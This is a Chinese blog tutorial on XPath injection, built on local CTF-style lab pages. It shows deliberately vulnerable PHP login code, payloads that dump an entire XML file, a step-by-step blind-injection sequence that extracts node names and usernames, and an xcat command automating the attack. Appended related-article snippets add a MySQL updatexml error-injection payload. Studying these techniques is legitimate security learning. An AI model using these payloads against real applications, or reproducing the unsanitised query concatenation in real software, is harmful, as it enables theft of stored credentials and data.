mysql xpath注入_XPath注入学习

最新推荐文章于 2022-10-05 23:23:48 发布
最新推荐文章于 2022-10-05 23:23:48 发布
阅读量435 收藏 3
点赞数
文章标签: mysql xpath注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_26841957/article/details/113649600
版权
本文介绍了XPath注入的基本概念、原理和实例,包括如何利用注入获取XML数据。通过示例展示了如何利用']|//*|//*[' payload获取整个XML文件内容。此外,还探讨了XPath盲注的步骤,并提到了自动化工具XCat的使用,以及在使用过程中遇到的问题。
摘要由CSDN通过智能技术生成

XPath注入学习

这篇记录是看完先知社区:XPATH注入学习写的,所以可能很多内容是重复的。写这篇记录仅仅为了让自己更好的掌握XPath注入。

0x01 XPath入门

在学习XPath注入之前,先了解一下什么是XPath

学习入口:W3school学习XPath

按照我个人的理解,XPath就是用于查询xml节点的查询语句,类似于T-SQL。

0x02 XPath注入原理

XPath注入原理类似于SQL注入,当程序没有对用户输入的数据进行过滤就拼接到XPath查询语句中时,就可能产生XPath注入。但是与SQL注入不同的时,XPath没有用户权限这一说法,所以XPath注入容易导致所有XML数据泄露。

0x03 实例

实例1

// 1.php

$xml = simplexml_load_file('test.xml');

$query = "user/username[@name='" . $_GET['name'] . "']";

$result = $xml->xpath($query);

foreach($result as $k => $v){

echo $k . ' => ' . $v . '
';

}

?>

user1_value

user2_value

user3_value

user4_value

user5_value

user6_value

user7_value

flag{57e7f266bb0dc62f2cb0f25976c14e93}

正常XPath功能

当我们访问地址http://ctf.cn/1.php?name=user1时,查询语句是:user/username[@name='user1']。所以会查询user下的username节点,且username节点name属性的值为user1的节点内容。返回结果如下:

ff825beee5e51c25c6ce48d949ae9ff7.png

判断注入点

当我们在参数值中输入单引号'时,页面出现XPath查询报错,说明可能存在XPath注入。

此时的XPath语句:user/username[@name='user1'']

a1149ab9b437063fa5826b5b62b9c081.png

进一步判断注入点(获取更多数据)

当我们输入' or '1'='1时,可以看到将user/username下的所有节点值都查询出来了。

此时的XPath语句:user/username[@name='user1' or '1'='1']

680f98b5fcf29c042ba2b1f609e2ad68.png

获取整个xml文件数据

但是我们显然是不满足于获取这点数据的,XPath中一个类似于SQL注入中' or '1'='1的payload:']|//*|//*[',我们尝试一下:

此时的XPath语句:user/username[@name='user1']|//*|//*['']

df201477d71ec2127bc1825be809b977.png

payload解析

payload:']|//*|//*['

这里首先通过']闭合前面的语句,然后使用|运算符(使用|拼接多个语句时会返回多个语句查询结果的节点并集)拼接多个语句。

拼接的//*查询文档中所有元素

最后的//*['是为了闭合后面的']

实例2

在一些情况下,虽然后台代码执行了我们注入的XPath语句,当时没有回显数据,这时候就需要一些手段来进行盲注了。

// login.php

username:

password:

if (file_exists('account.xml')) {

$xml = simplexml_load_file('account.xml');

if ($_POST['submit']) {

$username = $_POST['username'];

$password = $_POST['password'];

$x_query = "/accounts/user[username='{$username}' and password='{$password}']";

print_r('XPath query:' . $x_query);

$result = $xml->xpath($x_query);

if (count($result) == 0) {

echo '

登录失败';

} else {

echo "

登录成功";

$login_user = $result[0]->username;

echo "you login as $login_user";

}

}

}

?>

Twe1ve

admin@xx.com

administrator

P@ssword123

test

tw@xx.com

normal

123456

下面的内容很多是照抄的,但是加了自己对payload细节的理解😅

XPath盲注步骤:

判断根节点下的节点数量

判断根节点下节点长度

判断根节点下节点名称

......

重复猜解完成所有

从根节点开始判断

count()函数返回节点数量

'or count(/)=1 and ''='

'or count(/*)=1 and ''='

这里的count(/)和count(/*)效果是一样的,都是获取根节点数量。而一个xml文件,仅允许有一个根节点,所以按照我个人的理解,这一步应该可以省略(非权威!!!)。然后还发现文章中的payload结尾用or ''='的话表达式恒等于真,没法判断,所以我改用and ''='了。

判断根节点长度为8

string-length()函数返回字符串长度

'or string-length(name(/*[1]))=8 and ''='

或者

'or string-length(name(/*))=8 and ''='

因为只有一个根节点,可以不使用[1]来指定第一个节点

猜解根节点名称

substring()函数类似于mysql的substring()

'or substring(name(/*[1]), 1, 1)='a' and ''='

或者

'or substring(name(/*), 1, 1)='a' and ''='

最终猜测得出根节点名称为:accounts

猜解根节点accounts下的子节点数量

' or count(/accounts/*)=2 and ''='

猜解根节点accounts下的第一个子节点名称长度

' or string-length(name(/accounts/*[1]))=4 and ''='

猜解根节点accounts下的第一个子节点名称

' or substring(name(/accounts/*[1]),1,1)='u' and ''='

最终猜测得出名称为:user

猜解/accounts/user下第一个子节点名称长度

' or string-length(name(/accounts/user/*[1]))=8 and ''='

猜解/accounts/user下第一个子节点名称

' or substring(name(/accounts/user/*[1]),1,1)='u' and ''='

最终猜测得出名称为:username

验证猜解结果

' or substring(name(/accounts/user[1]/*[1]),1)='username' and ''='

继续猜解/accounts/user[1]/username[1]/下是否有子节点

' or count(/accounts/user[1]/username/*)=0 and ''='

长度=0,无子节点

猜解/accounts/user[1]/username[1]的数据长度

' or string-length(/accounts/user[1]/username[1])=6 and ''='

数据长度为6

猜解/accounts/user[1]/username[1]的数据

' or substring((/accounts/user[1]/username[1]),1,1)='T' and ''='

最终数据为:Twe1ve

以此类推,最终获得所有的数据

0x04 自动化

手工盲注的时候你肯定很想念SQL注入中的sqlmap,XPath也有自动化的注入工具:XCat

官方和--help的使用说明着实让我难受,我这里就贴出我使用的命令行:

xcat run -e FORM -m POST --true-string Twe1ve http://ctf.cn/login.php password password=P@ssword123

// login.php

// account.xml是引用实例2中的

if (file_exists('account.xml')) {

$xml = simplexml_load_file('account.xml');

$username = 'Twe1ve';

$password = $_POST['password'];

$x_query = "/accounts/user[username='{$username}' and password='{$password}']";

//print_r('XPath query:' . $x_query);

$result = $xml->xpath($x_query);

if (count($result) == 0) {

echo '

登录失败';

} else {

echo "

登录成功";

$login_user = $result[0]->username;

echo "you login as $login_user";

}

}

?>

命令解析:

run 注入数据

-e 有两个值,URL或FORM,分别指定将payload放在URL上还是FORM上,就是get和post

--true-string 指定当页面出现某个字符串时查询条件为真,这里设置Twe1ve是因为登录成功时会提示登录成功you login as Twe1ve

password 请求参数

password=P@ssword123 请求参数的值,当值为P@ssword123时查询语句为真

在使用过程中,发现xcat无法指定多个参数。也就是说,xcat测试POST参数存在注入的时候只能发送username=admin,不能发送username=admin&password=pass。GET好像可以通过-b来指定一个文件,但是具体没有尝试过。通过多次测试没有找到可正常使用的办法,太菜了!

执行结果:

08c89172ab6cb9f5b103dbd72d0b821a.png

未解决的问题

看到先知社区:XPATH注入学习中一些payload使用position()=1来定位第1个节点,但是用[1]一样可以,为什么要写更复杂,这里我没有弄明白。希望各位师傅们能指点一下。

17110e21f489388885771920096f392e.png

25663b8b8889094ea749e35c08a208e2.png

2c54aa62b6e265b3c88f7a55f1ffa2e0.png

有不对的地方,还望各位师傅斧正!

马伯庸
关注
MySQL注入XPath注入
m0_69305074的博客
04-28 1049
0x00 XPath基础知识 这个部分只是单纯铺垫XPath基础知识,不涉及注入,了解XPath可以跳过 这里直接引用 w3school的XPath教程 中间的案例,因为里面给了好多示例,基本一看就懂的那种。 XPath是什么? XPath是用来从XML文档中进行查找信息的语言。 XPath节点(Node) XPath中有7种类型的节点:元素、属性、文本、命名空间、处理指令、注释以及文档(根)节点 这个没有太大了解的必要,知道节点这个名词就够了,不需要分得特别细致。 选取节点 后面都以..
mysql漏洞函数xpath_XPATH注入
weixin_30185907的博客
01-28 688
前言在网上看到了一个XPATH注入,发现自己确实有的地方没见过。。就拿来学习了一下链接:XPATHXPath 即为 XML 路径语言,是 W3C XSLT 标准的主要元素,它是一种用来确定 XML(标准通用标记语言的子集)文档中某部分位置的语言。XPath 基于 XML 的树状结构,有不同类型的节点,包括元素节点,属性节点和文本节点,提供在数据结构树中找寻节点的能力,可用来在 XML 文档中对元素...
mysql对xml的支持
king_share的专栏
09-18 355
MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML(),下面是这两个函数的使用示例: 还是一样我们首先建立一个示例数据库,然后将范例中使用的XML文档输入到数据库中: CREATE TABLE x (doc VARCHAR(150)); INSERT INTO x VALUES (' A guide to the...
mysql漏洞函数xpath_SQL注入漏洞--报错注入
weixin_30045091的博客
01-28 355
报错注入报错注入在没法用union联合查询时用,但前提还是不能过滤一些关键的函数。报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。具体原理请参考:https://www.cnblogs.com/richardlee97/p/10617115.html利用函数xpath语法错误利用xpath语法错误来进行报错注入主要利用extractvalue和update...
xpath mysql_MySQLXPath使用详解
weixin_35671798的博客
01-19 719
今天我要为大家介绍的是XPathXPath是导航和查询XML文档的语言。我们从一个函数开始。UpdateXML()函数我们已经花了很多时间介绍ExtractValue()函数,但还没有介绍MySQL的其它XML函数,如UpdateXML(),因为我们先前主要将内容放在将XML文档中的数据导入到MySQL数据库中了,UpdateXML()是一个使用不同的XML标记匹配和替换XML块的函数。Extr...
mysql漏洞函数xpath_【漏洞汇总】SQL 注入漏洞之 mysql
weixin_35917998的博客
01-19 533
日期:2019-07-23 19:55:59更新:2019-08-02 10:40:37作者:Bay0net介绍:Mysql 注入笔记0x01、 基本信息1.1 基本术语数据库: 数据库是一些关联表的集合。数据表: 表是数据的矩阵。在一个数据库中的表看起来像一个简单的电子表格。列: 一列(数据元素) 包含了相同类型的数据, 例如邮政编码的数据。行:一行(=元组,或记录)是一组相关的数据,例如一条用...
mysql注入ctf_CTF考点总结-sql注入
weixin_36488760的博客
01-28 1112
整理下sql相关知识,查漏补缺(长期更新)常用语句及知识information_schema包含了大量有用的信息,例如下图mysql.user下有所有的用户信息,其中authentication_string为用户密码的hash,如果可以使用可以修改这个值,那么就可以修改任意用户的密码当前用户:select user()数据库版本:select version() , select @@versi...
mysql+limit+sql注入_sql注入之limit注入和五种时间盲注姿势
weixin_28803437的博客
01-19 657
0x00前言limit注入和时间前面也提过一点点了,真的非常简单,真不太想单独写一个这个来水博客。。这里还是记录一下吧以后忘了方便复习。0x01 limit基础知识照抄前面的:这里简单记录一下我自己经常会忘的知识点,觉得不值得再写一篇博客去水了233使用查询语句的时候,经常要使用limit返回前几条或者中间某几行数据SELECT*FROMtableLIMIT[offset,]rows...
mysql xpath_xpath的常见操作
weixin_33196828的博客
02-10 153
#-*- coding: utf-8 -*-importscrapyimportsysimporthashlibfrom scrapy.contrib.spiders importCrawlSpider, Rulefrom scrapy.contrib.linkextractors importLinkExtractorfrom datetime import *from common_lib i...
SQL注入xpath函数updatexml()和extractvalue()报错注入原理
金 帛的博客
04-26 4138
SQL注入之报错注入原理
xcat:XPath注入工具
05-02
XCat XCat是一个命令行工具,可以利用和调查XPath盲注漏洞。 有关完整的参考,请阅读此处的文档: : 它支持大量功能: 自动选择注射(运行xcat injections以获得列表) 检测xpath解析器的版本和功能,并选择最快的检索方法 内置越界HTTP服务器 自动化XXE攻击 可以使用OOB HTTP请求大大加快检索速度 自定义请求标头和正文 内置REPL外壳,支持: 读取任意文件 读取环境变量 列出目录 上载/下载文件(TM) 优化检索 如果可用,对unicode代码点使用二进制搜索 回退包括搜索先前首先检索到的常见字符 规范化unicode以减少搜索空间 安装 运行pip install xcat 或使用docker run -it tomforbes/xcat --help 或在fedora上dnf install xcat :smiling_face_with_sunglasses: 需要Python
写了个Py脚本 关于 Sql-labs的 xpath注入
weixin_45619494的博客
10-05 240
yuju = input("(输入 0 停止)请输入sql注入语句 :")yuju = input("(输入 0 停止)请输入sql注入语句 :")order by : 利用 order by 语句 ,相当于判断 闭合。b1 = input("---请输入模块(最前方数字)--- :")a1 = input("---请输入闭合--- :")a1 = input("---请输入闭合--- :")s = input("---请输入关卡--- :")关卡为 sqllab 靶场 的关卡。
xpath mysql_xpath定位元素
weixin_35368330的博客
02-22 94
@ 表示包含的属性,如@id表示包含id属性的标签[] 表示索引.. 表示父节点---------------------------------------------------//*           #定位到文档的所有节点/*          #定位到文档的所有节点//          从任意位置找对应标识定位/          绝对路径...
sql注入练习1(XPath报错)
kkzzjx
05-29 664
文章为自我记录,相关原理还是得自己查呀 前置知识xpath XPath 使用路径表达式在 XML 文档中选取节点。节点是通过沿着路径或者 step 来选取的。 下面列出了最有用的路径表达式: 表达式 描述 nodename 选取此节点的所有子节点。 / 从根节点选取。 // 从匹配选择的当前节点选择文档中的节点,而不考虑它们的位置。 . 选取当前节点。 … 选取当前节点的父节点。 @ 选取属性。 实例 在下面的表格中,我们已列出了一些路径表达式以及表达式的结果: .
mysql中xml数据的xpath支持_Xpath完美操作XML数据库
weixin_39708636的博客
02-02 147
XPath 是XML的查询语言,和SQL的角色很类似。以下面XML为例,介绍XPath 的语法。Empire BurlesqueBob Dylan10.90Hide your heartBonnie Tyler9.90Greatest HitsDolly Parton9.90定位节点XML是树状结构,类似档案系统内数据夹的结构,XPath也类似档案系统的路径命名方式。不过XPath 是一种模式(P...
xpath mysql_xpath 定位小技巧
weixin_33400538的博客
02-22 95
绝对路径定位find_element_by_xpath('/html/body/div[1]/*[2]/input')/表示从根节点开始,body中的第一个div标签下的第二个标签(*表示匹配所有类型标签)下的input标签。注意这个同级下第几个元素是从1开始的,同级下只有一个该标签就不用指定第几个了,比如上面的input利用元素属性进行定位find_element_by_xpath('//img...
xpath mysql_MYSQL注入XPATH 爆信息分析
weixin_29162439的博客
01-19 130
mysql 5.1以后提供了内置的XML文件解析和函数,所以这种注入只能用于5.1版本以后主要涉及两个函数:ExtractValue()和UpdateXML()首先看这两个函数的使用示例:先建立一个带XML格式的示例数据库CREATE TABLE x (doc VARCHAR(150));INSERT INTO x VALUES(‘A guide to the SQL standardCJDate...
mysql语法元素_XPath语法
weixin_35907598的博客
02-08 99
在SQL Server 2005中,FOR XML 功能得到了增强,它有了对根元素和元素名称的新的选项、使用FOR XML 调用以便你可以建立复杂的层次关系的能力、和一个新的使得你可以定义将要使用XPath 语法来提取的XML结构的PATH 模式,如下面的示例所示: SELECT ProductID在SQL Server 2005中,FOR XML 功能得到了增强,它有了对根元素和元素名称的新的选...
xpath mysql_xpath定位方法详解
weixin_33362555的博客
01-19 152
1.xpath较复杂的定位方法:现在要引用id为“J_password”的input元素,可以像下面这样写:WebElement password = driver.findElement(By.xpath("//*[@id='J_login_form']/dl/dt/input[@id='J_password']"));其中//*[@id=’ J_login_form’]这一段是指在根元素下查找...
mysql报错注入updatexml原理
最新发布
05-17
MySQL 报错注入是一种利用错误信息披露漏洞来进行 SQL 注入攻击的方法。其中,updatexml 函数是一种常用的利用方式之一。 updatexml 函数可以用于对 XML 类型的数据进行操作。其基本语法如下: ``` updatexml(target_xml, xpath_expr, new_value) ``` 其中,target_xml 是待修改的 XML 数据,xpath_expr 是 XPath 表达式,new_value 是新的值。 在进行 SQL 注入攻击时,攻击者可以构造恶意的 xpath_expr 参数,使得 MySQL 数据库返回错误的信息,从而获取敏感信息。 具体实现方法可以参考以下示例: ``` SELECT updatexml(null,concat(0x7e,(SELECT user()),0x7e),null); ``` 在这个例子中,攻击者使用 concat 函数将波浪符号(0x7e)和当前用户的信息拼接成字符串,并作为 xpath_expr 参数传递给 updatexml 函数。由于这个参数不合法,MySQL 数据库会返回错误信息,其中包含了当前用户的信息。攻击者就可以从错误信息中获取敏感信息。 为了防止这种攻击,应该对用户输入进行严格的过滤和验证,避免恶意的输入。同时,也可以通过限制 MySQL 用户的权限来降低攻击的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值